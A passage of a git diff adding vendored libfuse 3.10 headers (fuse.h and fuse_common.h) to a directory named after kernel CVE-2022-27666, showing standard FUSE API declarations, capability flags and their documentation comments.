through the FUSE kernel module + * to user space (glibc) and then back into the FUSE filesystem again. + * + * In case this method is not implemented, applications are expected to + * fall back to a regular file copy. (Some glibc versions did this + * emulation automatically, but the emulation has been removed from all + * glibc release branches.) + */ + ssize_t (*copy_file_range) (const char *path_in, + struct fuse_file_info *fi_in, + off_t offset_in, const char *path_out, + struct fuse_file_info *fi_out, + off_t offset_out, size_t size, int flags); + + /** + * Find next data or hole after the specified offset + */ + off_t (*lseek) (const char *, off_t off, int whence, struct fuse_file_info *); +}; + +/** Extra context that may be needed by some filesystems + * + * The uid, gid and pid fields are not filled in case of a writepage + * operation. + */ +struct fuse_context { + /** Pointer to the fuse object */ + struct fuse *fuse; + + /** User ID of the calling process */ + uid_t uid; + + /** Group ID of the calling process */ + gid_t gid; + + /** Process ID of the calling thread */ + pid_t pid; + + /** Private filesystem data */ + void *private_data; + + /** Umask of the calling process */ + mode_t umask; +}; + +/** + * Main function of FUSE. + * + * This is for the lazy. This is all that has to be called from the + * main() function. + * + * This function does the following: + * - parses command line options, and handles --help and + * --version + * - installs signal handlers for INT, HUP, TERM and PIPE + * - registers an exit handler to unmount the filesystem on program exit + * - creates a fuse handle + * - registers the operations + * - calls either the single-threaded or the multi-threaded event loop + * + * Most file systems will have to parse some file-system specific + * arguments before calling this function. It is recommended to do + * this with fuse_opt_parse() and a processing function that passes + * through any unknown options (this can also be achieved by just + * passing NULL as the processing function). That way, the remaining + * options can be passed directly to fuse_main(). + * + * fuse_main() accepts all options that can be passed to + * fuse_parse_cmdline(), fuse_new(), or fuse_session_new(). + * + * Option parsing skips argv[0], which is assumed to contain the + * program name. This element must always be present and is used to + * construct a basic ``usage: `` message for the --help + * output. argv[0] may also be set to the empty string. In this case + * the usage message is suppressed. This can be used by file systems + * to print their own usage line first. See hello.c for an example of + * how to do this. + * + * Note: this is currently implemented as a macro. + * + * The following error codes may be returned from fuse_main(): + * 1: Invalid option arguments + * 2: No mount point specified + * 3: FUSE setup failed + * 4: Mounting failed + * 5: Failed to daemonize (detach from session) + * 6: Failed to set up signal handlers + * 7: An error occurred during the life of the file system + * + * @param argc the argument counter passed to the main() function + * @param argv the argument vector passed to the main() function + * @param op the file system operation + * @param private_data Initial value for the `private_data` + * field of `struct fuse_context`. May be overridden by the + * `struct fuse_operations.init` handler. + * @return 0 on success, nonzero on failure + * + * Example usage, see hello.c + */ +/* + int fuse_main(int argc, char *argv[], const struct fuse_operations *op, + void *private_data); +*/ +#define fuse_main(argc, argv, op, private_data) \ + fuse_main_real(argc, argv, op, sizeof(*(op)), private_data) + +/* ----------------------------------------------------------- * + * More detailed API * + * ----------------------------------------------------------- */ + +/** + * Print available options (high- and low-level) to stdout. This is + * not an exhaustive list, but includes only those options that may be + * of interest to an end-user of a file system. + * + * The function looks at the argument vector only to determine if + * there are additional modules to be loaded (module=foo option), + * and attempts to call their help functions as well. + * + * @param args the argument vector. + */ +void fuse_lib_help(struct fuse_args *args); + +/** + * Create a new FUSE filesystem. + * + * This function accepts most file-system independent mount options + * (like context, nodev, ro - see mount(8)), as well as the + * FUSE-specific mount options from mount.fuse(8). + * + * If the --help option is specified, the function writes a help text + * to stdout and returns NULL. + * + * Option parsing skips argv[0], which is assumed to contain the + * program name. This element must always be present and is used to + * construct a basic ``usage: `` message for the --help output. If + * argv[0] is set to the empty string, no usage message is included in + * the --help output. + * + * If an unknown option is passed in, an error message is written to + * stderr and the function returns NULL. + * + * @param args argument vector + * @param op the filesystem operations + * @param op_size the size of the fuse_operations structure + * @param private_data Initial value for the `private_data` + * field of `struct fuse_context`. May be overridden by the + * `struct fuse_operations.init` handler. + * @return the created FUSE handle + */ +#if FUSE_USE_VERSION == 30 +struct fuse *fuse_new_30(struct fuse_args *args, const struct fuse_operations *op, + size_t op_size, void *private_data); +#define fuse_new(args, op, size, data) fuse_new_30(args, op, size, data) +#else +struct fuse *fuse_new(struct fuse_args *args, const struct fuse_operations *op, + size_t op_size, void *private_data); +#endif + +/** + * Mount a FUSE file system. + * + * @param mountpoint the mount point path + * @param f the FUSE handle + * + * @return 0 on success, -1 on failure. + **/ +int fuse_mount(struct fuse *f, const char *mountpoint); + +/** + * Unmount a FUSE file system. + * + * See fuse_session_unmount() for additional information. + * + * @param f the FUSE handle + **/ +void fuse_unmount(struct fuse *f); + +/** + * Destroy the FUSE handle. + * + * NOTE: This function does not unmount the filesystem. If this is + * needed, call fuse_unmount() before calling this function. + * + * @param f the FUSE handle + */ +void fuse_destroy(struct fuse *f); + +/** + * FUSE event loop. + * + * Requests from the kernel are processed, and the appropriate + * operations are called. + * + * For a description of the return value and the conditions when the + * event loop exits, refer to the documentation of + * fuse_session_loop(). + * + * @param f the FUSE handle + * @return see fuse_session_loop() + * + * See also: fuse_loop_mt() + */ +int fuse_loop(struct fuse *f); + +/** + * Flag session as terminated + * + * This function will cause any running event loops to exit on + * the next opportunity. + * + * @param f the FUSE handle + */ +void fuse_exit(struct fuse *f); + +#if FUSE_USE_VERSION < 32 +int fuse_loop_mt_31(struct fuse *f, int clone_fd); +#define fuse_loop_mt(f, clone_fd) fuse_loop_mt_31(f, clone_fd) +#else +/** + * FUSE event loop with multiple threads + * + * Requests from the kernel are processed, and the appropriate + * operations are called. Request are processed in parallel by + * distributing them between multiple threads. + * + * For a description of the return value and the conditions when the + * event loop exits, refer to the documentation of + * fuse_session_loop(). + * + * Note: using fuse_loop() instead of fuse_loop_mt() means you are running in + * single-threaded mode, and that you will not have to worry about reentrancy, + * though you will have to worry about recursive lookups. In single-threaded + * mode, FUSE will wait for one callback to return before calling another. + * + * Enabling multiple threads, by using fuse_loop_mt(), will cause FUSE to make + * multiple simultaneous calls into the various callback functions given by your + * fuse_operations record. + * + * If you are using multiple threads, you can enjoy all the parallel execution + * and interactive response benefits of threads, and you get to enjoy all the + * benefits of race conditions and locking bugs, too. Ensure that any code used + * in the callback function of fuse_operations is also thread-safe. + * + * @param f the FUSE handle + * @param config loop configuration + * @return see fuse_session_loop() + * + * See also: fuse_loop() + */ +int fuse_loop_mt(struct fuse *f, struct fuse_loop_config *config); +#endif + +/** + * Get the current context + * + * The context is only valid for the duration of a filesystem + * operation, and thus must not be stored and used later. + * + * @return the context + */ +struct fuse_context *fuse_get_context(void); + +/** + * Get the current supplementary group IDs for the current request + * + * Similar to the getgroups(2) system call, except the return value is + * always the total number of group IDs, even if it is larger than the + * specified size. + * + * The current fuse kernel module in linux (as of 2.6.30) doesn't pass + * the group list to userspace, hence this function needs to parse + * "/proc/$TID/task/$TID/status" to get the group IDs. + * + * This feature may not be supported on all operating systems. In + * such a case this function will return -ENOSYS. + * + * @param size size of given array + * @param list array of group IDs to be filled in + * @return the total number of supplementary group IDs or -errno on failure + */ +int fuse_getgroups(int size, gid_t list[]); + +/** + * Check if the current request has already been interrupted + * + * @return 1 if the request has been interrupted, 0 otherwise + */ +int fuse_interrupted(void); + +/** + * Invalidates cache for the given path. + * + * This calls fuse_lowlevel_notify_inval_inode internally. + * + * @return 0 on successful invalidation, negative error value otherwise. + * This routine may return -ENOENT to indicate that there was + * no entry to be invalidated, e.g., because the path has not + * been seen before or has been forgotten; this should not be + * considered to be an error. + */ +int fuse_invalidate_path(struct fuse *f, const char *path); + +/** + * The real main function + * + * Do not call this directly, use fuse_main() + */ +int fuse_main_real(int argc, char *argv[], const struct fuse_operations *op, + size_t op_size, void *private_data); + +/** + * Start the cleanup thread when using option "remember". + * + * This is done automatically by fuse_loop_mt() + * @param fuse struct fuse pointer for fuse instance + * @return 0 on success and -1 on error + */ +int fuse_start_cleanup_thread(struct fuse *fuse); + +/** + * Stop the cleanup thread when using option "remember". + * + * This is done automatically by fuse_loop_mt() + * @param fuse struct fuse pointer for fuse instance + */ +void fuse_stop_cleanup_thread(struct fuse *fuse); + +/** + * Iterate over cache removing stale entries + * use in conjunction with "-oremember" + * + * NOTE: This is already done for the standard sessions + * + * @param fuse struct fuse pointer for fuse instance + * @return the number of seconds until the next cleanup + */ +int fuse_clean_cache(struct fuse *fuse); + +/* + * Stacking API + */ + +/** + * Fuse filesystem object + * + * This is opaque object represents a filesystem layer + */ +struct fuse_fs; + +/* + * These functions call the relevant filesystem operation, and return + * the result. + * + * If the operation is not defined, they return -ENOSYS, with the + * exception of fuse_fs_open, fuse_fs_release, fuse_fs_opendir, + * fuse_fs_releasedir and fuse_fs_statfs, which return 0. + */ + +int fuse_fs_getattr(struct fuse_fs *fs, const char *path, struct stat *buf, + struct fuse_file_info *fi); +int fuse_fs_rename(struct fuse_fs *fs, const char *oldpath, + const char *newpath, unsigned int flags); +int fuse_fs_unlink(struct fuse_fs *fs, const char *path); +int fuse_fs_rmdir(struct fuse_fs *fs, const char *path); +int fuse_fs_symlink(struct fuse_fs *fs, const char *linkname, + const char *path); +int fuse_fs_link(struct fuse_fs *fs, const char *oldpath, const char *newpath); +int fuse_fs_release(struct fuse_fs *fs, const char *path, + struct fuse_file_info *fi); +int fuse_fs_open(struct fuse_fs *fs, const char *path, + struct fuse_file_info *fi); +int fuse_fs_read(struct fuse_fs *fs, const char *path, char *buf, size_t size, + off_t off, struct fuse_file_info *fi); +int fuse_fs_read_buf(struct fuse_fs *fs, const char *path, + struct fuse_bufvec **bufp, size_t size, off_t off, + struct fuse_file_info *fi); +int fuse_fs_write(struct fuse_fs *fs, const char *path, const char *buf, + size_t size, off_t off, struct fuse_file_info *fi); +int fuse_fs_write_buf(struct fuse_fs *fs, const char *path, + struct fuse_bufvec *buf, off_t off, + struct fuse_file_info *fi); +int fuse_fs_fsync(struct fuse_fs *fs, const char *path, int datasync, + struct fuse_file_info *fi); +int fuse_fs_flush(struct fuse_fs *fs, const char *path, + struct fuse_file_info *fi); +int fuse_fs_statfs(struct fuse_fs *fs, const char *path, struct statvfs *buf); +int fuse_fs_opendir(struct fuse_fs *fs, const char *path, + struct fuse_file_info *fi); +int fuse_fs_readdir(struct fuse_fs *fs, const char *path, void *buf, + fuse_fill_dir_t filler, off_t off, + struct fuse_file_info *fi, enum fuse_readdir_flags flags); +int fuse_fs_fsyncdir(struct fuse_fs *fs, const char *path, int datasync, + struct fuse_file_info *fi); +int fuse_fs_releasedir(struct fuse_fs *fs, const char *path, + struct fuse_file_info *fi); +int fuse_fs_create(struct fuse_fs *fs, const char *path, mode_t mode, + struct fuse_file_info *fi); +int fuse_fs_lock(struct fuse_fs *fs, const char *path, + struct fuse_file_info *fi, int cmd, struct flock *lock); +int fuse_fs_flock(struct fuse_fs *fs, const char *path, + struct fuse_file_info *fi, int op); +int fuse_fs_chmod(struct fuse_fs *fs, const char *path, mode_t mode, + struct fuse_file_info *fi); +int fuse_fs_chown(struct fuse_fs *fs, const char *path, uid_t uid, gid_t gid, + struct fuse_file_info *fi); +int fuse_fs_truncate(struct fuse_fs *fs, const char *path, off_t size, + struct fuse_file_info *fi); +int fuse_fs_utimens(struct fuse_fs *fs, const char *path, + const struct timespec tv[2], struct fuse_file_info *fi); +int fuse_fs_access(struct fuse_fs *fs, const char *path, int mask); +int fuse_fs_readlink(struct fuse_fs *fs, const char *path, char *buf, + size_t len); +int fuse_fs_mknod(struct fuse_fs *fs, const char *path, mode_t mode, + dev_t rdev); +int fuse_fs_mkdir(struct fuse_fs *fs, const char *path, mode_t mode); +int fuse_fs_setxattr(struct fuse_fs *fs, const char *path, const char *name, + const char *value, size_t size, int flags); +int fuse_fs_getxattr(struct fuse_fs *fs, const char *path, const char *name, + char *value, size_t size); +int fuse_fs_listxattr(struct fuse_fs *fs, const char *path, char *list, + size_t size); +int fuse_fs_removexattr(struct fuse_fs *fs, const char *path, + const char *name); +int fuse_fs_bmap(struct fuse_fs *fs, const char *path, size_t blocksize, + uint64_t *idx); +#if FUSE_USE_VERSION < 35 +int fuse_fs_ioctl(struct fuse_fs *fs, const char *path, int cmd, + void *arg, struct fuse_file_info *fi, unsigned int flags, + void *data); +#else +int fuse_fs_ioctl(struct fuse_fs *fs, const char *path, unsigned int cmd, + void *arg, struct fuse_file_info *fi, unsigned int flags, + void *data); +#endif +int fuse_fs_poll(struct fuse_fs *fs, const char *path, + struct fuse_file_info *fi, struct fuse_pollhandle *ph, + unsigned *reventsp); +int fuse_fs_fallocate(struct fuse_fs *fs, const char *path, int mode, + off_t offset, off_t length, struct fuse_file_info *fi); +ssize_t fuse_fs_copy_file_range(struct fuse_fs *fs, const char *path_in, + struct fuse_file_info *fi_in, off_t off_in, + const char *path_out, + struct fuse_file_info *fi_out, off_t off_out, + size_t len, int flags); +off_t fuse_fs_lseek(struct fuse_fs *fs, const char *path, off_t off, int whence, + struct fuse_file_info *fi); +void fuse_fs_init(struct fuse_fs *fs, struct fuse_conn_info *conn, + struct fuse_config *cfg); +void fuse_fs_destroy(struct fuse_fs *fs); + +int fuse_notify_poll(struct fuse_pollhandle *ph); + +/** + * Create a new fuse filesystem object + * + * This is usually called from the factory of a fuse module to create + * a new instance of a filesystem. + * + * @param op the filesystem operations + * @param op_size the size of the fuse_operations structure + * @param private_data Initial value for the `private_data` + * field of `struct fuse_context`. May be overridden by the + * `struct fuse_operations.init` handler. + * @return a new filesystem object + */ +struct fuse_fs *fuse_fs_new(const struct fuse_operations *op, size_t op_size, + void *private_data); + +/** + * Factory for creating filesystem objects + * + * The function may use and remove options from 'args' that belong + * to this module. + * + * For now the 'fs' vector always contains exactly one filesystem. + * This is the filesystem which will be below the newly created + * filesystem in the stack. + * + * @param args the command line arguments + * @param fs NULL terminated filesystem object vector + * @return the new filesystem object + */ +typedef struct fuse_fs *(*fuse_module_factory_t)(struct fuse_args *args, + struct fuse_fs *fs[]); +/** + * Register filesystem module + * + * If the "-omodules=*name*_:..." option is present, filesystem + * objects are created and pushed onto the stack with the *factory_* + * function. + * + * @param name_ the name of this filesystem module + * @param factory_ the factory function for this filesystem module + */ +#define FUSE_REGISTER_MODULE(name_, factory_) \ + fuse_module_factory_t fuse_module_ ## name_ ## _factory = factory_ + +/** Get session from fuse object */ +struct fuse_session *fuse_get_session(struct fuse *f); + +/** + * Open a FUSE file descriptor and set up the mount for the given + * mountpoint and flags. + * + * @param mountpoint reference to the mount in the file system + * @param options mount options + * @return the FUSE file descriptor or -1 upon error + */ +int fuse_open_channel(const char *mountpoint, const char *options); + +#ifdef __cplusplus +} +#endif + +#endif /* FUSE_H_ */ diff --git a/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_common.h b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_common.h new file mode 100644 index 0000000000000000000000000000000000000000..ea4bdb02427d244c24dd87519ca3883e4a659f75 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_common.h @@ -0,0 +1,859 @@ +/* FUSE: Filesystem in Userspace + Copyright (C) 2001-2007 Miklos Szeredi + + This program can be distributed under the terms of the GNU LGPLv2. + See the file COPYING.LIB. +*/ + +/** @file */ + +#if !defined(FUSE_H_) && !defined(FUSE_LOWLEVEL_H_) +#error "Never include directly; use or instead." +#endif + +#ifndef FUSE_COMMON_H_ +#define FUSE_COMMON_H_ + +#include "fuse_opt.h" +#include "fuse_log.h" +#include +#include + +/** Major version of FUSE library interface */ +#define FUSE_MAJOR_VERSION 3 + +/** Minor version of FUSE library interface */ +#define FUSE_MINOR_VERSION 10 + +#define FUSE_MAKE_VERSION(maj, min) ((maj) * 100 + (min)) +#define FUSE_VERSION FUSE_MAKE_VERSION(FUSE_MAJOR_VERSION, FUSE_MINOR_VERSION) + +#ifdef __cplusplus +extern "C" { +#endif + +/** + * Information about an open file. + * + * File Handles are created by the open, opendir, and create methods and closed + * by the release and releasedir methods. Multiple file handles may be + * concurrently open for the same file. Generally, a client will create one + * file handle per file descriptor, though in some cases multiple file + * descriptors can share a single file handle. + */ +struct fuse_file_info { + /** Open flags. Available in open() and release() */ + int flags; + + /** In case of a write operation indicates if this was caused + by a delayed write from the page cache. If so, then the + context's pid, uid, and gid fields will not be valid, and + the *fh* value may not match the *fh* value that would + have been sent with the corresponding individual write + requests if write caching had been disabled. */ + unsigned int writepage : 1; + + /** Can be filled in by open, to use direct I/O on this file. */ + unsigned int direct_io : 1; + + /** Can be filled in by open. It signals the kernel that any + currently cached file data (ie., data that the filesystem + provided the last time the file was open) need not be + invalidated. Has no effect when set in other contexts (in + particular it does nothing when set by opendir()). */ + unsigned int keep_cache : 1; + + /** Indicates a flush operation. Set in flush operation, also + maybe set in highlevel lock operation and lowlevel release + operation. */ + unsigned int flush : 1; + + /** Can be filled in by open, to indicate that the file is not + seekable. */ + unsigned int nonseekable : 1; + + /* Indicates that flock locks for this file should be + released. If set, lock_owner shall contain a valid value. + May only be set in ->release(). */ + unsigned int flock_release : 1; + + /** Can be filled in by opendir. It signals the kernel to + enable caching of entries returned by readdir(). Has no + effect when set in other contexts (in particular it does + nothing when set by open()). */ + unsigned int cache_readdir : 1; + + /** Padding. Reserved for future use*/ + unsigned int padding : 25; + unsigned int padding2 : 32; + + /** File handle id. May be filled in by filesystem in create, + * open, and opendir(). Available in most other file operations on the + * same file handle. */ + uint64_t fh; + + /** Lock owner id. Available in locking operations and flush */ + uint64_t lock_owner; + + /** Requested poll events. Available in ->poll. Only set on kernels + which support it. If unsupported, this field is set to zero. */ + uint32_t poll_events; +}; + +/** + * Configuration parameters passed to fuse_session_loop_mt() and + * fuse_loop_mt(). + */ +struct fuse_loop_config { + /** + * whether to use separate device fds for each thread + * (may increase performance) + */ + int clone_fd; + + /** + * The maximum number of available worker threads before they + * start to get deleted when they become idle. If not + * specified, the default is 10. + * + * Adjusting this has performance implications; a very small number + * of threads in the pool will cause a lot of thread creation and + * deletion overhead and performance may suffer. When set to 0, a new + * thread will be created to service every operation. + */ + unsigned int max_idle_threads; +}; + +/************************************************************************** + * Capability bits for 'fuse_conn_info.capable' and 'fuse_conn_info.want' * + **************************************************************************/ + +/** + * Indicates that the filesystem supports asynchronous read requests. + * + * If this capability is not requested/available, the kernel will + * ensure that there is at most one pending read request per + * file-handle at any time, and will attempt to order read requests by + * increasing offset. + * + * This feature is enabled by default when supported by the kernel. + */ +#define FUSE_CAP_ASYNC_READ (1 << 0) + +/** + * Indicates that the filesystem supports "remote" locking. + * + * This feature is enabled by default when supported by the kernel, + * and if getlk() and setlk() handlers are implemented. + */ +#define FUSE_CAP_POSIX_LOCKS (1 << 1) + +/** + * Indicates that the filesystem supports the O_TRUNC open flag. If + * disabled, and an application specifies O_TRUNC, fuse first calls + * truncate() and then open() with O_TRUNC filtered out. + * + * This feature is enabled by default when supported by the kernel. + */ +#define FUSE_CAP_ATOMIC_O_TRUNC (1 << 3) + +/** + * Indicates that the filesystem supports lookups of "." and "..". + * + * This feature is disabled by default. + */ +#define FUSE_CAP_EXPORT_SUPPORT (1 << 4) + +/** + * Indicates that the kernel should not apply the umask to the + * file mode on create operations. + * + * This feature is disabled by default. + */ +#define FUSE_CAP_DONT_MASK (1 << 6) + +/** + * Indicates that libfuse should try to use splice() when writing to + * the fuse device. This may improve performance. + * + * This feature is disabled by default. + */ +#define FUSE_CAP_SPLICE_WRITE (1 << 7) + +/** + * Indicates that libfuse should try to move pages instead of copying when + * writing to / reading from the fuse device. This may improve performance. + * + * This feature is disabled by default. + */ +#define FUSE_CAP_SPLICE_MOVE (1 << 8) + +/** + * Indicates that libfuse should try to use splice() when reading from + * the fuse device. This may improve performance. + * + * This feature is enabled by default when supported by the kernel and + * if the filesystem implements a write_buf() handler. + */ +#define FUSE_CAP_SPLICE_READ (1 << 9) + +/** + * If set, the calls to flock(2) will be emulated using POSIX locks and must + * then be handled by the filesystem's setlock() handler. + * + * If not set, flock(2) calls will be handled by the FUSE kernel module + * internally (so any access that does not go through the kernel cannot be taken + * into account). + * + * This feature is enabled by default when supported by the kernel and + * if the filesystem implements a flock() handler. + */ +#define FUSE_CAP_FLOCK_LOCKS (1 << 10) + +/** + * Indicates that the filesystem supports ioctl's on directories. + * + * This feature is enabled by default when supported by the kernel. + */ +#define FUSE_CAP_IOCTL_DIR (1 << 11) + +/** + * Traditionally, while a file is open the FUSE kernel module only + * asks the filesystem for an update of the file's attributes when a + * client attempts to read beyond EOF. This is unsuitable for + * e.g. network filesystems, where the file contents may change + * without the kernel knowing about it. + * + * If this flag is set, FUSE will check the validity of the attributes + * on every read. If the attributes are no longer valid (i.e., if the + * *attr_timeout* passed to fuse_reply_attr() or set in `struct + * fuse_entry_param` has passed), it will first issue a `getattr` + * request. If the new mtime differs from the previous value, any + * cached file *contents* will be invalidated as well. + * + * This flag should always be set when available. If all file changes + * go through the kernel, *attr_timeout* should be set to a very large + * number to avoid unnecessary getattr() calls. + * + * This feature is enabled by default when supported by the kernel. + */ +#define FUSE_CAP_AUTO_INVAL_DATA (1 << 12) + +/** + * Indicates that the filesystem supports readdirplus. + * + * This feature is enabled by default when supported by the kernel and if the + * filesystem implements a readdirplus() handler. + */ +#define FUSE_CAP_READDIRPLUS (1 << 13) + +/** + * Indicates that the filesystem supports adaptive readdirplus. + * + * If FUSE_CAP_READDIRPLUS is not set, this flag has no effect. + * + * If FUSE_CAP_READDIRPLUS is set and this flag is not set, the kernel + * will always issue readdirplus() requests to retrieve directory + * contents. + * + * If FUSE_CAP_READDIRPLUS is set and this flag is set, the kernel + * will issue both readdir() and readdirplus() requests, depending on + * how much information is expected to be required. + * + * As of Linux 4.20, the algorithm is as follows: when userspace + * starts to read directory entries, issue a READDIRPLUS request to + * the filesystem. If any entry attributes have been looked up by the + * time userspace requests the next batch of entries continue with + * READDIRPLUS, otherwise switch to plain READDIR. This will reasult + * in eg plain "ls" triggering READDIRPLUS first then READDIR after + * that because it doesn't do lookups. "ls -l" should result in all + * READDIRPLUS, except if dentries are already cached. + * + * This feature is enabled by default when supported by the kernel and + * if the filesystem implements both a readdirplus() and a readdir() + * handler. + */ +#define FUSE_CAP_READDIRPLUS_AUTO (1 << 14) + +/** + * Indicates that the filesystem supports asynchronous direct I/O submission. + * + * If this capability is not requested/available, the kernel will ensure that + * there is at most one pending read and one pending write request per direct + * I/O file-handle at any time. + * + * This feature is enabled by default when supported by the kernel. + */ +#define FUSE_CAP_ASYNC_DIO (1 << 15) + +/** + * Indicates that writeback caching should be enabled. This means that + * individual write request may be buffered and merged in the kernel + * before they are send to the filesystem. + * + * This feature is disabled by default. + */ +#define FUSE_CAP_WRITEBACK_CACHE (1 << 16) + +/** + * Indicates support for zero-message opens. If this flag is set in + * the `capable` field of the `fuse_conn_info` structure, then the + * filesystem may return `ENOSYS` from the open() handler to indicate + * success. Further attempts to open files will be handled in the + * kernel. (If this flag is not set, returning ENOSYS will be treated + * as an error and signaled to the caller). + * + * Setting (or unsetting) this flag in the `want` field has *no + * effect*. + */ +#define FUSE_CAP_NO_OPEN_SUPPORT (1 << 17) + +/** + * Indicates support for parallel directory operations. If this flag + * is unset, the FUSE kernel module will ensure that lookup() and + * readdir() requests are never issued concurrently for the same + * directory. + * + * This feature is enabled by default when supported by the kernel. + */ +#define FUSE_CAP_PARALLEL_DIROPS (1 << 18) + +/** + * Indicates support for POSIX ACLs. + * + * If this feature is enabled, the kernel will cache and have + * responsibility for enforcing ACLs. ACL will be stored as xattrs and + * passed to userspace, which is responsible for updating the ACLs in + * the filesystem, keeping the file mode in sync with the ACL, and + * ensuring inheritance of default ACLs when new filesystem nodes are + * created. Note that this requires that the file system is able to + * parse and interpret the xattr representation of ACLs. + * + * Enabling this feature implicitly turns on the + * ``default_permissions`` mount option (even if it was not passed to + * mount(2)). + * + * This feature is disabled by default. + */ +#define FUSE_CAP_POSIX_ACL (1 << 19) + +/** + * Indicates that the filesystem is responsible for unsetting + * setuid and setgid bits when a file is written, truncated, or + * its owner is changed. + * + * This feature is enabled by default when supported by the kernel. + */ +#define FUSE_CAP_HANDLE_KILLPRIV (1 << 20) + +/** + * Indicates that the kernel supports caching symlinks in its page cache. + * + * When this feature is enabled, symlink targets are saved in the page cache. + * You can invalidate a cached link by calling: + * `fuse_lowlevel_notify_inval_inode(se, ino, 0, 0);` + * + * This feature is disabled by default. + * If the kernel supports it (>= 4.20), you can enable this feature by + * setting this flag in the `want` field of the `fuse_conn_info` structure. + */ +#define FUSE_CAP_CACHE_SYMLINKS (1 << 23) + +/** + * Indicates support for zero-message opendirs. If this flag is set in + * the `capable` field of the `fuse_conn_info` structure, then the filesystem + * may return `ENOSYS` from the opendir() handler to indicate success. Further + * opendir and releasedir messages will be handled in the kernel. (If this + * flag is not set, returning ENOSYS will be treated as an error and signalled + * to the caller.) + * + * Setting (or unsetting) this flag in the `want` field has *no effect*. + */ +#define FUSE_CAP_NO_OPENDIR_SUPPORT (1 << 24) + +/** + * Indicates support for invalidating cached pages only on explicit request. + * + * If this flag is set in the `capable` field of the `fuse_conn_info` structure, + * then the FUSE kernel module supports invalidating cached pages only on + * explicit request by the filesystem through fuse_lowlevel_notify_inval_inode() + * or fuse_invalidate_path(). + * + * By setting this flag in the `want` field of the `fuse_conn_info` structure, + * the filesystem is responsible for invalidating cached pages through explicit + * requests to the kernel. + * + * Note that setting this flag does not prevent the cached pages from being + * flushed by OS itself and/or through user actions. + * + * Note that if both FUSE_CAP_EXPLICIT_INVAL_DATA and FUSE_CAP_AUTO_INVAL_DATA + * are set in the `capable` field of the `fuse_conn_info` structure then + * FUSE_CAP_AUTO_INVAL_DATA takes precedence. + * + * This feature is disabled by default. + */ +#define FUSE_CAP_EXPLICIT_INVAL_DATA (1 << 25) + +/** + * Ioctl flags + * + * FUSE_IOCTL_COMPAT: 32bit compat ioctl on 64bit machine + * FUSE_IOCTL_UNRESTRICTED: not restricted to well-formed ioctls, retry allowed + * FUSE_IOCTL_RETRY: retry with new iovecs + * FUSE_IOCTL_DIR: is a directory + * + * FUSE_IOCTL_MAX_IOV: maximum of in_iovecs + out_iovecs + */ +#define FUSE_IOCTL_COMPAT (1 << 0) +#define FUSE_IOCTL_UNRESTRICTED (1 << 1) +#define FUSE_IOCTL_RETRY (1 << 2) +#define FUSE_IOCTL_DIR (1 << 4) + +#define FUSE_IOCTL_MAX_IOV 256 + +/** + * Connection information, passed to the ->init() method + * + * Some of the elements are read-write, these can be changed to + * indicate the value requested by the filesystem. The requested + * value must usually be smaller than the indicated value. + */ +struct fuse_conn_info { + /** + * Major version of the protocol (read-only) + */ + unsigned proto_major; + + /** + * Minor version of the protocol (read-only) + */ + unsigned proto_minor; + + /** + * Maximum size of the write buffer + */ + unsigned max_write; + + /** + * Maximum size of read requests. A value of zero indicates no + * limit. However, even if the filesystem does not specify a + * limit, the maximum size of read requests will still be + * limited by the kernel. + * + * NOTE: For the time being, the maximum size of read requests + * must be set both here *and* passed to fuse_session_new() + * using the ``-o max_read=`` mount option. At some point + * in the future, specifying the mount option will no longer + * be necessary. + */ + unsigned max_read; + + /** + * Maximum readahead + */ + unsigned max_readahead; + + /** + * Capability flags that the kernel supports (read-only) + */ + unsigned capable; + + /** + * Capability flags that the filesystem wants to enable. + * + * libfuse attempts to initialize this field with + * reasonable default values before calling the init() handler. + */ + unsigned want; + + /** + * Maximum number of pending "background" requests. A + * background request is any type of request for which the + * total number is not limited by other means. As of kernel + * 4.8, only two types of requests fall into this category: + * + * 1. Read-ahead requests + * 2. Asynchronous direct I/O requests + * + * Read-ahead requests are generated (if max_readahead is + * non-zero) by the kernel to preemptively fill its caches + * when it anticipates that userspace will soon read more + * data. + * + * Asynchronous direct I/O requests are generated if + * FUSE_CAP_ASYNC_DIO is enabled and userspace submits a large + * direct I/O request. In this case the kernel will internally + * split it up into multiple smaller requests and submit them + * to the filesystem concurrently. + * + * Note that the following requests are *not* background + * requests: writeback requests (limited by the kernel's + * flusher algorithm), regular (i.e., synchronous and + * buffered) userspace read/write requests (limited to one per + * thread), asynchronous read requests (Linux's io_submit(2) + * call actually blocks, so these are also limited to one per + * thread). + */ + unsigned max_background; + + /** + * Kernel congestion threshold parameter. If the number of pending + * background requests exceeds this number, the FUSE kernel module will + * mark the filesystem as "congested". This instructs the kernel to + * expect that queued requests will take some time to complete, and to + * adjust its algorithms accordingly (e.g. by putting a waiting thread + * to sleep instead of using a busy-loop). + */ + unsigned congestion_threshold; + + /** + * When FUSE_CAP_WRITEBACK_CACHE is enabled, the kernel is responsible + * for updating mtime and ctime when write requests are received. The + * updated values are passed to the filesystem with setattr() requests. + * However, if the filesystem does not support the full resolution of + * the kernel timestamps (nanoseconds), the mtime and ctime values used + * by kernel and filesystem will differ (and result in an apparent + * change of times after a cache flush). + * + * To prevent this problem, this variable can be used to inform the + * kernel about the timestamp granularity supported by the file-system. + * The value should be power of 10. The default is 1, i.e. full + * nano-second resolution. Filesystems supporting only second resolution + * should set this to 1000000000. + */ + unsigned time_gran; + + /** + * For future use. + */ + unsigned reserved[22]; +}; + +struct fuse_session; +struct fuse_pollhandle; +struct fuse_conn_info_opts; + +/** + * This function parses several command-line options that can be used + * to override elements of struct fuse_conn_info. The pointer returned + * by this function should be passed to the + * fuse_apply_conn_info_opts() method by the file system's init() + * handler. + * + * Before using this function, think twice if you really want these + * parameters to be adjustable from the command line. In most cases, + * they should be determined by the file system internally. + * + * The following options are recognized: + * + * -o max_write=N sets conn->max_write + * -o max_readahead=N sets conn->max_readahead + * -o max_background=N sets conn->max_background + * -o congestion_threshold=N sets conn->congestion_threshold + * -o async_read sets FUSE_CAP_ASYNC_READ in conn->want + * -o sync_read unsets FUSE_CAP_ASYNC_READ in conn->want + * -o atomic_o_trunc sets FUSE_CAP_ATOMIC_O_TRUNC in conn->want + * -o no_remote_lock Equivalent to -o no_remote_flock,no_remote_posix_lock + * -o no_remote_flock Unsets FUSE_CAP_FLOCK_LOCKS in conn->want + * -o no_remote_posix_lock Unsets FUSE_CAP_POSIX_LOCKS in conn->want + * -o [no_]splice_write (un-)sets FUSE_CAP_SPLICE_WRITE in 